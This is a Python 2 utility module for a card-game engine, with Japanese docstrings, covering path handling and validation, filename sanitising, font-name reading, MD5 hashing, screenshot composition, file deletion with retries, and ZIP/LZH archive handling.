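# first, ints sort before other types, and same types compare directly.
assert cmp2(None, None) == 0 and cmp2(None, 0) == -1 and cmp2(0, None) == 1
assert cmp2(1, 2) == -1 and cmp2(2, 1) == 1 and cmp2(2, 2) == 0
assert cmp2(1, u"a") == -1 and cmp2(u"a", 1) == 1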
def sorted_by_attr(seq, *attr):
"""非破壊的にオブジェクトの属性でソートする。
seq: リスト
attr: 属性名
"""
return _sorted_by_attr_impl(False, seq, *attr)
def sort_by_attr(seq, *attr):
"""破壊的にオブジェクトの属性でソートする。
seq: リスト
attr: 属性名
"""
return _sorted_by_attr_impl(True, seq, *attr)
assert sort_by_attr(["a1234b", "a12b", "a1234b"]) == ["a12b", "a1234b", "a1234b"]
assert sort_by_attr(["a12b", "a1234b", "a1b", "a9b", "a01234b", "a1234b", "a-."]) == ["a1b", "a9b", "a12b", "a01234b", "a1234b", "a1234b", "a-."]
assert sort_by_attr([(1, "a"), None, (0, "b"), (0, "c")]) == [None, (0, "b"), (0, "c"), (1, "a")]
def new_order(seq, mode=1):
"""order属性を持つアイテムのlistを
走査して新しいorderを返す。
必要であれば、seq内のorderを振り直す。
mode: 0=最大order。1=最小order。orderの振り直しが発生する
"""
if mode == 0:
order = -1
for item in seq:
order = max(item.order, order)
return order + 1
else:
for item in seq:
item.order += 1
return 0
def join_paths(*paths):
"""パス結合。ディレクトリの区切り文字はプラットホームに関わらず"/"固定。
セキュリティ上の問題を避けるため、あえて絶対パスは取り扱わない。
*paths: パス結合する文字列
"""
return "/".join(filter(lambda a: a, paths)).replace("\\", "/").rstrip("/")
# FIXME: For some paths a warning like the following appears on standard
# error, but the details are unknown:
# ***\ntpath.py:533: UnicodeWarning: Unicode unequal comparison failed to convert both arguments to Unicode - interpreting them as being unequal
# It probably causes no practical problem, so suppress the warning for now.
import warnings
warnings.filterwarnings("ignore", category=UnicodeWarning)
def relpath(path, start):
if len(start) < len(path) and path.startswith(start) and start <> "":
path2 = path[len(start):]
if path2[0] == '/' or (sys.platform == "win32" and path2[0] == '\\'):
return path2[1:]
try:
path = os.path.abspath(path)
return os.path.relpath(path, start)
except:
return path
assert relpath("Data/abc", "Data") == "abc"
assert relpath("Data/abc/def", "Data").replace("\\", "/") == "abc/def"
assert relpath("Data/abc/def", "Data/abc/").replace("\\", "/") == "def"
assert relpath("Data/abc/def", "Data/abc") == os.path.relpath("Data/abc/def", "Data/abc")
assert relpath("Data/abc/def", "..").replace("\\", "/") == os.path.relpath("Data/abc/def", "..").replace("\\", "/")
assert relpath(".", "..").replace("\\", "/") == os.path.relpath(".", "..").replace("\\", "/")
assert relpath("/a", "..").replace("\\", "/") == os.path.relpath("/a", "..").replace("\\", "/")
assert relpath("a", "../bcde").replace("\\", "/") == os.path.relpath("a", "../bcde").replace("\\", "/")
assert relpath("../a", "../bcde").replace("\\", "/") == os.path.relpath("../a", "../bcde").replace("\\", "/")
assert relpath("../a", "../").replace("\\", "/") == os.path.relpath("../a", "../").replace("\\", "/")
def validate_filepath(fpath):
"""
fpathが絶対パスまたは外部ディレクトリを指定する
相対パスであれば空文字列に置換する。
"""
if isinstance(fpath, list):
seq = []
for f in fpath:
f = validate_filepath(f)
if f:
seq.append(f)
return seq
else:
from cw.binary.image import path_is_code
if not fpath:
return ""
if cw.binary.image.path_is_code(fpath):
return fpath
if os.path.isabs(fpath):
return ""
else:
n = join_paths(os.path.normpath(fpath))
if n == ".." or n.startswith("../"):
return ""
return fpath
assert validate_filepath(["/test/abc", None, "test/../test", "test/../../abc", "../abc"]) ==\
["test/../test"]
def is_descendant(path, start):
"""
pathはstartのサブディレクトリにあるか。
ある場合は相対パスを返す。
"""
if not path or not start:
return False
rel = join_paths(relpath(path, start))
if os.path.isabs(rel):
return False
if rel.startswith("../"):
return False
return rel
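# Illustrative checks, in this file's inline-assert style:
assert is_descendant("Data/abc/def", "Data") == "abc/def"
assert is_descendant("Other/abc", "Data") is False
assert is_descendant("", "Data") is False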
def splitext(p):
"""パスの拡張子以外の部分と拡張子部分の分割。
os.path.splitext()との違いは、".ext"のような
拡張子部分だけのパスの時、(".ext", "")ではなく
("", ".ext")を返す事である。
"""
p = os.path.splitext(p)
if p[0].startswith(".") and not p[1]:
return (p[1], p[0])
return p
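# Illustrative checks, in this file's inline-assert style:
assert splitext(".ext") == ("", ".ext")
assert splitext("dir/file.tar.gz") == ("dir/file.tar", ".gz")
assert splitext("noext") == ("noext", "")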
def str2bool(s):
"""特定の文字列をbool値にして返す。
s: bool値に変換する文字列(true, false, 1, 0など)。
"""
if isinstance(s, bool):
return s
else:
s = s.lower()
if s == "true":
return True
elif s == "false":
return False
elif s == "1":
return True
elif s == "0":
return False
else:
raise ValueError("%s is incorrect value!" % (s))
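# Illustrative checks, in this file's inline-assert style:
assert str2bool("TRUE") is True
assert str2bool(u"0") is False
assert str2bool(False) is False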
def numwrap(n, nmin, nmax):
"""最小値、最大値の範囲内でnの値を返す。
n: 範囲内で調整される値。
nmin: 最小値。
nmax: 最大値。
"""
if n < nmin:
n = nmin
elif n > nmax:
n = nmax
return n
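# Illustrative checks, in this file's inline-assert style:
assert numwrap(5, 0, 3) == 3
assert numwrap(-1, 0, 3) == 0
assert numwrap(2, 0, 3) == 2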
def div_vocation(value):
"""能力判定のために能力値を2で割る。
0以上の場合とマイナス値の場合で式が異なる。
"""
if value < 0:
return (value+2) // 2
else:
return (value+1) // 2
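# Illustrative checks; note the floor division on the negative branch:
assert div_vocation(5) == 3
assert div_vocation(0) == 0
assert div_vocation(-5) == -2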
def get_truetypefontname(path):
"""引数のTrueTypeFontファイルを読み込んで、フォントネームを返す。
ref http://mail.python.org/pipermail/python-list/2008-September/508476.html
path: TrueTypeFontファイルのパス。
"""
#customize path
with open(path, "rb") as f:
#header
shead= struct.Struct( ">IHHHH" )
fhead= f.read( shead.size )
dhead= shead.unpack_from( fhead, 0 )
#font directory
stable= struct.Struct( ">4sIII" )
ftable= f.read( stable.size* dhead[ 1 ] )
for i in xrange( dhead[1] ): #directory records
dtable= stable.unpack_from(
ftable, i* stable.size )
if dtable[0]== "name": break
assert dtable[0]== "name"
#name table
f.seek( dtable[2] ) #at offset
fnametable= f.read( dtable[3] ) #length
snamehead= struct.Struct( ">HHH" ) #name table head
dnamehead= snamehead.unpack_from( fnametable, 0 )
sname= struct.Struct( ">HHHHHH" )
fontname = ""
for i in xrange( dnamehead[1] ): #name table records
dname= sname.unpack_from(fnametable, snamehead.size+ i* sname.size )
if dname[3]== 4: #key == 4: "full name of font"
s= struct.unpack_from(
'%is'% dname[4], fnametable,
dnamehead[2]+ dname[5] )[0]
if dname[:3] == (1, 0, 0):
fontname = s
elif dname[:3] == (3, 1, 1033):
s = s.split("\x00")
fontname = "".join(s)
f.close()
return fontname
def get_md5(path):
"""MD5を使ったハッシュ値を返す。
path: ハッシュ値を求めるファイルのパス。
"""
m = hashlib.md5()
with open(path, "rb") as f:
while True:
data = f.read(32768)
if not data:
break
m.update(data)
f.close()
return m.hexdigest()
def get_md5_from_data(data):
"""MD5を使ったハッシュ値を返す。
path: ハッシュ値を求めるファイルのパス。
"""
m = hashlib.md5()
m.update(data)
return m.hexdigest()
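# Illustrative checks against the well-known RFC 1321 test vectors:
assert get_md5_from_data("") == "d41d8cd98f00b204e9800998ecf8427e"
assert get_md5_from_data("abc") == "900150983cd24fb0d6963f7d28e17f72"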
def number_normalization(value, fromvalue, tovalue):
"""数値を範囲内の値に正規化する。
value: 正規化対象の数値。
fromvalue: 範囲の最小値。
tovalue: 範囲の最大値+1。
"""
if 0 == tovalue:
return value
if tovalue <= value or value < fromvalue:
value -= (value // tovalue) * tovalue
if value < fromvalue:
value += tovalue
return value
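# Illustrative checks: values wrap around into [fromvalue, tovalue),
# and a tovalue of 0 leaves the value untouched.
assert number_normalization(7, 0, 5) == 2
assert number_normalization(-1, 0, 5) == 4
assert number_normalization(3, 0, 0) == 3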
def print_ex(file=None):
"""例外の内容を標準出力に書き足す。
"""
if file is None:
file = sys.stdout
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback, file=file)
file.write("\n")
return
def screenshot_title(titledic):
"""スクリーンショットタイトルの書き出し。
"""
title = format_title(cw.cwpy.setting.ssinfoformat, titledic)
return title
def screenshot_header(title, w):
"""スクリーンショット情報の書き出し。
"""
fore = cw.cwpy.setting.ssinfofontcolor
back = cw.cwpy.setting.ssinfobackcolor
font = cw.cwpy.rsrc.fonts["screenshot"]
fh = font.size("#")[1]
lh = fh + 2
imgs = []
for color in (fore, back):
subimg = font.render(title, True, color)
swmax = w - cw.s(5)*2
if swmax < subimg.get_width():
size = (swmax, subimg.get_height())
subimg = cw.image.smoothscale(subimg, size)
imgs.append(subimg)
imgs[1].fill((255, 255, 255, 80), special_flags=pygame.locals.BLEND_RGBA_MULT)
return imgs[0], imgs[1], fh, lh
def screenshot():
"""スクリーンショットをファイルへ書き出す。
"""
cw.cwpy.play_sound("screenshot")
titledic, titledicfn = cw.cwpy.get_titledic(with_datetime=True, for_fname=True)
filename = create_screenshotfilename(titledicfn)
    try:
        dpath = os.path.dirname(filename)
        if os.path.isdir(dpath):
            # Avoid silently overwriting an existing file of the same name.
            filename = dupcheck_plus(filename, yado=False)
        else:
            os.makedirs(dpath)
        bmp, y = create_screenshot(titledic)
        encoding = sys.getfilesystemencoding()
        pygame.image.save(bmp, filename.encode(encoding))
    except:
        s = u"Failed to save the screenshot.\n%s" % (filename)
        cw.cwpy.call_modaldlg("ERROR", text=s)
def create_screenshotfilename(titledic):
"""スクリーンショット用のファイルパスを作成する。
"""
fpath = format_title(cw.cwpy.setting.ssfnameformat, titledic)
if not os.path.splitext(fpath)[1].lower() in cw.EXTS_IMG:
fpath += ".png"
return fpath
def create_screenshot(titledic):
"""スクリーンショットを作成する。
"""
title = screenshot_title(titledic)
scr = pygame.Surface(cw.cwpy.scr_draw.get_size()).convert()
cw.cwpy.draw_to(scr, False)
if title:
back = cw.cwpy.setting.ssinfobackcolor
w = cw.s(cw.SIZE_GAME[0])
subimg, subimg2, fh, lh = screenshot_header(title, w)
if cw.cwpy.setting.sswithstatusbar:
h = cw.s(cw.SIZE_GAME[1]) + lh
else:
h = cw.s(cw.SIZE_AREA[1]) + lh
bmp = pygame.Surface((w, h)).convert()
bmp.fill(back, rect=pygame.Rect(cw.s(0), cw.s(0), w, lh))
if cw.cwpy.setting.ssinfobackimage and os.path.isfile(cw.cwpy.setting.ssinfobackimage):
subimg3 = load_image(cw.cwpy.setting.ssinfobackimage, False)
fill_image(bmp, cw.s(subimg3), (w, lh))
else:
fpath = cw.util.find_resource(cw.util.join_paths(cw.cwpy.skindir,
"Resource/Image/Other/SCREENSHOT_HEADER"),
cw.M_IMG)
if fpath:
subimg3 = load_image(fpath, False)
fill_image(bmp, cw.s(subimg3), (w, lh))
bmp.blit(scr, (cw.s(0), lh))
x = cw.s(5)
y = (lh - fh) / 2
for xx in xrange(-1, 1+1):
for yy in xrange(-1, 1+1):
                if xx <> 0 or yy <> 0:  # skip the center offset; the foreground text goes there
bmp.blit(subimg2, (x+xx, y+yy))
bmp.blit(subimg, (x, y))
y = lh
else:
if cw.cwpy.setting.sswithstatusbar:
bmp = scr
else:
bmp = scr.subsurface((cw.s((0, 0)), cw.s(cw.SIZE_AREA)))
y = cw.s(0)
return bmp, y
def card_screenshot():
""" パーティー所持カードのスクリーンショットをファイルへ書き出す。
"""
if cw.cwpy.ydata:
if cw.cwpy.ydata.party:
cw.cwpy.play_sound("screenshot")
titledic, titledicfn = cw.cwpy.get_titledic(with_datetime=True, for_fname=True)
            #PyLite: merged with the normal screenshot path
            filename = create_screenshotfilename(titledicfn)
            try:
                dpath = os.path.dirname(filename)
                if os.path.isdir(dpath):
                    # Avoid silently overwriting an existing file of the same name.
                    filename = dupcheck_plus(filename, yado=False)
                else:
                    os.makedirs(dpath)
                bmp = create_cardscreenshot(titledic)
                encoding = sys.getfilesystemencoding()
                pygame.image.save(bmp, filename.encode(encoding))
            except:
                s = u"Failed to save the screenshot.\n%s" % (filename)
                cw.cwpy.call_modaldlg("ERROR", text=s)
return True
return False
def create_cardscreenshot(titledic):
"""パーティー所持カードスクリーンショットを作成する。
"""
pcards = [i for i in cw.cwpy.get_pcards()]
if pcards:
max_card = [2, 2, 2]
margin = 2
        # Background tile colors; shades chosen to blend with the title bar.
back = [map(lambda n: min(255, max(0, n / 2 + 88)), cw.cwpy.setting.ssinfobackcolor),
map(lambda n: min(255, max(0, n / 2 + 40)), cw.cwpy.setting.ssinfobackcolor)]
        # Decide the tile sizes from the number of cards.
for pcard in pcards:
for index in (cw.POCKET_SKILL, cw.POCKET_ITEM, cw.POCKET_BEAST):
max_card[index] = max(len(pcard.cardpocket[index]), max_card[index])
w = cw.s(95 + 80 * sum(max_card) + margin * (5 + sum(max_card)))
h = cw.s((130 + 2 * margin) * len(pcards))
title = screenshot_title(titledic)
if title:
subimg, subimg2, fh, lh = screenshot_header(title, w)
h += lh
bmp = pygame.Surface((w, h)).convert()
bmp.fill(cw.cwpy.setting.ssinfobackcolor, rect=pygame.Rect(cw.s(0), cw.s(0), w, h))
        # background image
if title:
if cw.cwpy.setting.ssinfobackimage and os.path.isfile(cw.cwpy.setting.ssinfobackimage):
subimg3 = load_image(cw.cwpy.setting.ssinfobackimage, False)
fill_image(bmp, cw.s(subimg3), (w, lh))
else:
fpath = cw.util.find_resource(cw.util.join_paths(cw.cwpy.skindir,
"Resource/Image/Other/SCREENSHOT_HEADER"),
cw.M_IMG)
if fpath:
subimg3 = load_image(fpath, False)
fill_image(bmp, cw.s(subimg3), (w, lh))
        # compose the image
sy = cw.s(0)
if title:
x, y = cw.s(5), (lh - fh) / 2
for xx in xrange(-1, 1+1):
for yy in xrange(-1, 1+1):
                    if xx <> 0 or yy <> 0:  # skip the center offset; the foreground text goes there
bmp.blit(subimg2, (x+xx, y+yy))
bmp.blit(subimg, (x, y))
sy += lh
for i in range(len(pcards)):
backindex = (1 + i) % 2
bmp.fill(back[backindex], rect=pygame.Rect(cw.s(0), sy, cw.s(95 + 2 * margin), cw.s(130 + 2 * margin)))
bmp.blit(pcards[i].cardimg.image, (cw.s(margin), sy + cw.s(margin)))
def blit_card(headers, x, sy):
for header in headers:
if header.negaflag:
header.negaflag = False
bmp.blit(header.cardimg.get_cardimg(header), (cw.s(x), sy + cw.s(10 + margin)))
x += 80 + margin
current_x = 95 + 2 * margin
next_x = 0
for index in (cw.POCKET_SKILL, cw.POCKET_ITEM, cw.POCKET_BEAST):
current_x += next_x
next_x = 80 * max_card[index] + margin * (max_card[index] + 1)
backindex = (index + i) % 2
bmp.fill(back[backindex], rect=pygame.Rect(cw.s(current_x), sy, cw.s(next_x), cw.s(130 + 2 * margin)))
adjust_x = (max_card[index] - len(pcards[i].cardpocket[index]))
x = current_x + adjust_x * 40 + margin * (2 + adjust_x) / 2
blit_card(pcards[i].cardpocket[index], x, sy)
sy += cw.s(130 + 2 * margin)
    else:
        raise Exception(u"create_cardscreenshot called with no player cards")
return bmp
def to_clipboard(s):
"""テキストsをクリップボードへ転写する。"""
tdo = wx.TextDataObject()
tdo.SetText(s)
if wx.TheClipboard.Open():
wx.TheClipboard.SetData(tdo)
wx.TheClipboard.Close()
wx.TheClipboard.Flush()
#-------------------------------------------------------------------------------
# File operations
#-------------------------------------------------------------------------------
def dupcheck_plus(path, yado=True):
"""パスの重複チェック。引数のパスをチェックし、重複していたら、
ファイル・フォルダ名の後ろに"(n)"を付加して重複を回避する。
宿のファイルパスの場合は、"Data/Temp/Yado"ディレクトリの重複もチェックする。
"""
tempyado = cw.util.join_paths(cw.tempdir, u"Yado")
dpath, basename = os.path.split(path)
fname, ext = cw.util.splitext(basename)
fname = cw.binary.util.check_filename(fname.strip())
ext = ext.strip()
basename = fname + ext
path = join_paths(dpath, basename)
if yado:
if path.startswith("Yado"):
temppath = path.replace("Yado", tempyado, 1)
elif path.startswith(tempyado):
temppath = path.replace(tempyado, "Yado", 1)
else:
print u"宿パスの重複チェック失敗", path
temppath = ""
else:
temppath = ""
count = 2
while os.path.exists(path) or os.path.exists(temppath):
basename = "%s(%d)%s" % (fname, count, ext)
path = join_paths(dpath, basename)
if yado:
if path.startswith("Yado"):
temppath = path.replace("Yado", tempyado, 1)
elif path.startswith(tempyado):
temppath = path.replace(tempyado, "Yado", 1)
else:
print u"宿パスの重複チェック失敗", path
temppath = ""
count += 1
return join_paths(dpath, basename)
def repl_dischar(fname):
"""
ファイル名使用不可文字を代替文字に置換し、
両端に空白があった場合は削除する。
"""
d = {'\\': u'¥', '/': u'/', ':': u':', ',': u',', ';': u';',
'*': u'*', '?': u'?','"': u'”', '<': u'<', '>': u'>',
'|': u'|'}
for key, value in d.iteritems():
fname = fname.replace(key, value)
fname = fname.strip()
if fname == "":
fname = "noname"
return fname
def check_dischar(s):
"""
ファイル名使用不可文字を含んでいるかチェックする。
"""
seq = ('\\', '/', ':', ',', ';', '*', '?','"', '<', '>', '|', '"')
for i in seq:
if s.find(i) >= 0:
return True
return False
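# Illustrative checks for repl_dischar()/check_dischar(): replacement
# yields a name that no longer contains forbidden characters, and blank
# names fall back to "noname".
assert repl_dischar(u"   ") == u"noname"
assert not check_dischar(repl_dischar(u"a*b?c"))
assert check_dischar(u"a*b") and not check_dischar(u"ab")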
def join_yadodir(path):
"""
引数のpathを現在読み込んでいる宿ディレクトリと結合させる。
"Data/Temp/Yado"にパスが存在すれば、そちらを優先させる。
"""
temppath = join_paths(cw.cwpy.tempdir, path)
yadopath = join_paths(cw.cwpy.yadodir, path)
if os.path.exists(temppath):
return temppath
else:
return yadopath
def get_yadofilepath(path):
""""Data/Yado"もしくは"Data/Temp/Yado"のファイルパスの存在チェックをかけ、
存在しているパスを返す。存在していない場合は""を返す。
"Data/Temp/Yado"にパス優先。
"""
if not cw.cwpy.ydata:
return ""
elif path.startswith(cw.cwpy.tempdir):
temppath = path
yadopath = path.replace(cw.cwpy.tempdir, cw.cwpy.yadodir, 1)
elif path.startswith(cw.cwpy.yadodir):
temppath = path.replace(cw.cwpy.yadodir, cw.cwpy.tempdir, 1)
yadopath = path
else:
return ""
if yadopath in cw.cwpy.ydata.deletedpaths:
return ""
elif os.path.isfile(temppath):
return temppath
elif os.path.isfile(yadopath):
return yadopath
else:
return ""
def find_resource(path, mtype):
"""pathとmtypeに該当する素材を拡張子の優先順に沿って探す。"""
imgpath = ""
if mtype == cw.M_IMG:
t = (".png", ".bmp", ".gif", ".jpg")
elif mtype == cw.M_MSC:
t = (".ogg", ".mp3", ".mid", ".wav")
elif mtype == cw.M_SND:
t = (".wav", ".ogg", ".mp3", ".mid")
else:
assert False, mtype
if os.path.normcase("A") <> os.path.normcase("a"):
seq = []
for t2 in t[:]:
seq.append(t2)
seq.append(t2.upper())
t = seq
for ext in t:
path2 = path + ext
if cw.cwpy:
path2 = cw.cwpy.rsrc.get_filepath(path2)
if os.path.isfile(path2):
return path2
if is_descendant(path, cw.cwpy.skindir):
path = join_paths("Data/SkinBase", relpath(path, cw.cwpy.skindir))
return find_resource(path, mtype)
return u""
def get_inusecardmaterialpath(path, mtype, inusecard=None, findskin=True):
"""pathが宿からシナリオへ持ち込んだカードの
素材を指していればそのパスを返す。
そうでない場合は空文字列を返す。"""
imgpath = ""
if cw.cwpy.event.in_inusecardevent:
if inusecard or (cw.cwpy.is_runningevent() and cw.cwpy.event.get_inusecard()):
if not inusecard:
inusecard = cw.cwpy.event.get_inusecard()
if not inusecard.carddata.getbool(".", "scenariocard", False) or\
inusecard.carddata.gettext("Property/Materials", ""):
imgpath = cw.util.join_yadodir(path)
imgpath = get_materialpathfromskin(imgpath, mtype, findskin=findskin)
return imgpath
def get_materialpath(path, mtype, scedir="", system=False, findskin=True):
"""pathが指す素材を、シナリオプレイ中はシナリオ内から探し、
プレイ中でない場合や存在しない場合はスキンから探す。
path: 素材の相対パス。
type: 素材のタイプ。cw.M_IMG, cw.M_MSC, cw.M_SNDのいずれか。
"""
if mtype == cw.M_IMG and cw.binary.image.path_is_code(path):
return path
if not system and (cw.cwpy.is_playingscenario() or scedir):
tpath = cw.util.join_paths(cw.tempdir, u"ScenarioLog/TempFile", path)
tpath = cw.cwpy.rsrc.get_filepath(tpath)
if os.path.isfile(tpath):
path = tpath
else:
if not scedir:
scedir = cw.cwpy.sdata.scedir
path = cw.util.join_paths(scedir, path)
path = cw.cwpy.rsrc.get_filepath(path)
else:
path = cw.cwpy.rsrc.get_filepath(path)
if not os.path.isfile(path):
path = cw.util.join_paths(cw.cwpy.skindir, path)
return get_materialpathfromskin(path, mtype, findskin=findskin)
def get_materialpathfromskin(path, mtype, findskin=True):
if not os.path.isfile(path):
if not findskin:
path = ""
elif path.startswith(cw.cwpy.skindir):
fname = cw.util.splitext(path)[0]
if mtype == cw.M_IMG:
path2 = cw.util.find_resource(fname, cw.cwpy.rsrc.ext_img)
elif mtype == cw.M_MSC:
path2 = cw.util.find_resource(fname, cw.cwpy.rsrc.ext_bgm)
elif mtype == cw.M_SND:
path2 = cw.util.find_resource(fname, cw.cwpy.rsrc.ext_snd)
if path2:
return path2
fname = os.path.basename(path)
lfname = fname.lower()
eb = lfname.endswith(".jpy1") or lfname.endswith(".jptx") or lfname.endswith(".jpdc")
if not eb:
fname = cw.util.splitext(fname)[0]
dpaths = [cw.cwpy.skindir]
if os.path.isdir(u"Data/Materials"):
dpaths.extend(map(lambda d: cw.util.join_paths(u"Data/Materials", d), os.listdir(u"Data/Materials")))
for dpath in dpaths:
if eb:
                # Effect booster files are never remapped to other extensions.
path = cw.cwpy.rsrc.get_filepath(cw.util.join_paths(dpath, "Table", fname))
elif mtype == cw.M_IMG:
path = cw.util.find_resource(cw.util.join_paths(dpath, "Table", fname), cw.cwpy.rsrc.ext_img)
elif mtype == cw.M_MSC:
path = cw.util.find_resource(cw.util.join_paths(dpath, "Bgm", fname), cw.cwpy.rsrc.ext_bgm)
if not path:
path = cw.util.find_resource(cw.util.join_paths(dpath, "BgmAndSound", fname), cw.cwpy.rsrc.ext_bgm)
elif mtype == cw.M_SND:
path = cw.util.find_resource(cw.util.join_paths(dpath, "Sound", fname), cw.cwpy.rsrc.ext_snd)
if not path:
path = cw.util.find_resource(cw.util.join_paths(dpath, "BgmAndSound", fname), cw.cwpy.rsrc.ext_snd)
if path:
break
return path
def remove_temp():
"""
一時ディレクトリを空にする。
"""
dpath = cw.tempdir
if not os.path.exists(dpath):
os.makedirs(dpath)
removeall = True
for name in os.listdir(dpath):
if name in ("Scenario", "LockFiles"):
removeall = False
else:
path = join_paths(dpath, name)
try:
remove(path)
except:
print_ex()
remove_treefiles(path)
if removeall and cw.tempdir <> cw.tempdir_init:
try:
remove(cw.tempdir)
except:
print_ex()
remove_treefiles(cw.tempdir)
try:
remove(u"Data/Temp/Global/Deleted")
except:
pass
def remove(path, trashbox=False):
if os.path.isfile(path):
remove_file(path, trashbox=trashbox)
elif os.path.isdir(path):
if join_paths(path).lower().startswith("data/temp/") and not trashbox:
            # For the Temp folder, a leftover empty directory is mostly
            # harmless as long as its contents are gone.
try:
remove_treefiles(path, trashbox=trashbox)
remove_tree(path, noretry=True, trashbox=trashbox)
except:
            # Some environments occasionally fail to delete the folder.
#print_ex(file=sys.stderr)
print_ex()
remove_treefiles(path, trashbox=trashbox)
else:
if trashbox:
try:
remove_tree(path, trashbox=trashbox)
except:
print_ex()
remove_treefiles(path, trashbox=trashbox)
remove_tree(path, trashbox=trashbox)
else:
remove_treefiles(path, trashbox=trashbox)
remove_tree(path, trashbox=trashbox)
def remove_file(path, retry=0, trashbox=False):
try:
if trashbox:
send_trashbox(path)
else:
os.remove(path)
except WindowsError, err:
if err.errno == 13 and retry < 5:
os.chmod(path, stat.S_IWRITE|stat.S_IREAD)
remove_file(path, retry + 1, trashbox=trashbox)
        elif retry < 5:
            time.sleep(1)
            remove_file(path, retry + 1, trashbox=trashbox)
else:
raise err
def add_winauth(file):
if os.path.isfile(file) and sys.platform == "win32":
os.chmod(file, stat.S_IWRITE|stat.S_IREAD)
def remove_tree(treepath, retry=0, noretry=False, trashbox=False):
try:
if trashbox:
send_trashbox(treepath)
else:
shutil.rmtree(treepath)
except WindowsError, err:
if err.errno == 13 and retry < 5 and not noretry:
for dpath, dnames, fnames in os.walk(treepath):
for dname in dnames:
path = join_paths(dpath, dname)
if os.path.isdir(path):
try:
os.chmod(path, stat.S_IWRITE|stat.S_IREAD)
except WindowsError, err:
time.sleep(1)
remove_tree2(treepath, trashbox=trashbox)
return
for fname in fnames:
path = join_paths(dpath, fname)
if os.path.isfile(path):
try:
os.chmod(path, stat.S_IWRITE|stat.S_IREAD)
except WindowsError, err:
time.sleep(1)
remove_tree2(treepath, trashbox=trashbox)
return
remove_tree(treepath, retry + 1, trashbox=trashbox)
elif retry < 5 and not noretry:
time.sleep(1)
remove_tree(treepath, retry + 1, trashbox=trashbox)
else:
remove_tree2(treepath, trashbox=trashbox)
def remove_tree2(treepath, trashbox=False):
    # shutil.rmtree() sometimes errors out while granting permissions,
    # so try a different removal strategy.
for dpath, dnames, fnames in os.walk(treepath, topdown=False):
for dname in dnames:
path = join_paths(dpath, dname)
if os.path.isdir(path):
os.rmdir(path)
for fname in fnames:
path = join_paths(dpath, fname)
if os.path.isfile(path):
if trashbox:
send_trashbox(path)
else:
os.remove(path)
os.rmdir(treepath)
def remove_treefiles(treepath, trashbox=False):
    # remove_tree2() reportedly still fails on some environments, so at
    # least try to delete the files even if the directories remain.
for dpath, dnames, fnames in os.walk(treepath, topdown=False):
for fname in fnames:
path = join_paths(dpath, fname)
if os.path.isfile(path):
add_winauth(path)
if trashbox:
send_trashbox(path)
else:
os.remove(path)
def rename_file(path, dstpath, trashbox=False):
"""pathをdstpathへ移動する。
すでにdstpathがある場合は上書きされる。
"""
if not os.path.isdir(os.path.dirname(dstpath)):
os.makedirs(os.path.dirname(dstpath))
if os.path.isfile(dstpath):
remove_file(dstpath, trashbox=trashbox)
try:
shutil.move(path, dstpath)
except OSError:
        # shutil.move() can fail across different file systems,
        # so fall back to copy & delete.
print_ex()
with open(path, "rb") as f1:
with open(dstpath, "wb") as f2:
f2.write(f1.read())
f2.flush()
f2.close()
f1.close()
remove_file(path, trashbox=trashbox)
def send_trashbox(path):
"""
可能であればpathをゴミ箱へ送る。
"""
if sys.platform == "win32":
path = os.path.normpath(os.path.abspath(path))
ope = win32com.shell.shellcon.FO_DELETE
flags = win32com.shell.shellcon.FOF_NOCONFIRMATION |\
win32com.shell.shellcon.FOF_ALLOWUNDO |\
win32com.shell.shellcon.FOF_SILENT
win32com.shell.shell.SHFileOperation((None, ope, path + '\0\0', None, flags, None, None))
elif os.path.isfile(path):
os.remove(path)
elif os.path.isdir(path):
shutil.rmtree(path)
def remove_emptydir(dpath):
"""
dpathが中身の無いディレクトリであれば削除する。
"""
if os.path.isdir(dpath):
for dpath2, dnames, fnames in os.walk(dpath):
if len(fnames):
# 中身が存在する
return
remove(dpath)
OVERWRITE_ALWAYS = 0
NO_OVERWRITE = 1
OVERWRITE_WITH_LATEST_FILES = 2
#-------------------------------------------------------------------------------
# ZIP file handling
#-------------------------------------------------------------------------------
class _LhafileWrapper(lhafile.Lhafile):
def __init__(self, path, mode):
        # Some files begin with a hexadecimal file-size string followed by a
        # Windows line break; such files also carry extra data at the end, so
        # the payload must be truncated to the size given in that header.
        f = open(path, "rb")
        b = str(f.read(1))
        strnum = []
        # Note: read() returns "" at EOF, and "" is "in" any string,
        # so the emptiness check is required to avoid an endless loop.
        while b and b in "0123456789abcdefABCDEF":
            strnum.append(b)
            b = str(f.read(1))
if strnum and b == '\r' and f.read(1) == '\n':
strnum = "".join(strnum)
num = int(strnum, 16)
data = f.read(num)
f.close()
f = io.BytesIO(data)
lhafile.Lhafile.__init__(self, f)
self.f = f
else:
f.seek(0)
lhafile.Lhafile.__init__(self, f)
self.f = f
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
def close(self):
self.f.close()
def zip_file(path, mode):
"""zipfile.ZipFileのインスタンスを生成する。
FIXME: Python 2.7のzipfile.ZipFileはアーカイブ内の
ファイル名にあるディレクトリセパレータを'/'に置換してしまうため、
「ソ」などのいわゆるShift JISの0x5C問題に引っかかって
正しいファイル名が得られなくなってしまう。
まったくスレッドセーフではない悪い方法だが、
それを回避するには一時的にos.sepを'/'にして凌ぐしかない。"""
if path.lower().endswith(".lzh"):
return _LhafileWrapper(path, mode)
else:
sep = os.sep
os.sep = "/"
try:
return zipfile.ZipFile(path, mode)
finally:
os.sep = sep
def compress_zip(path, zpath, unicodefilename=False):
"""pathのデータをzpathで指定したzipファイルに圧縮する。
path: 圧縮するディレクトリパス
"""
if not unicodefilename:
encoding = sys.getfilesystemencoding()
dpath = os.path.dirname(zpath)
if dpath and not os.path.isdir(dpath):
os.makedirs(dpath)
z = zipfile.ZipFile(zpath, "w", zipfile.ZIP_DEFLATED)
rpl_dir = path + "/"
for dpath, dnames, fnames in os.walk(unicode(path)):
for dname in dnames:
fpath = join_paths(dpath, dname)
if os.path.isdir(fpath):
mtime = time.localtime(os.path.getmtime(fpath))[:6]
zname = fpath.replace(rpl_dir, "", 1) + "/"
zinfo = zipfile.ZipInfo(zname, mtime)
if unicodefilename:
zinfo.flag_bits |= 0x800
z.writestr(zinfo, "")
for fname in fnames:
fpath = join_paths(dpath, fname)
if os.path.isfile(fpath):
zname = fpath.replace(rpl_dir, "", 1)
if unicodefilename:
z.write(fpath, zname)
else:
z.write(fpath, zname.encode(encoding))
z.close()
return zpath
def decompress_zip(path, dstdir, dname="", startup=None, progress=None, overwrite=False):
"""zipファイルをdstdirに解凍する。
解凍したディレクトリのpathを返す。
"""
try:
z = zip_file(path, "r")
except:
return None
if not dname:
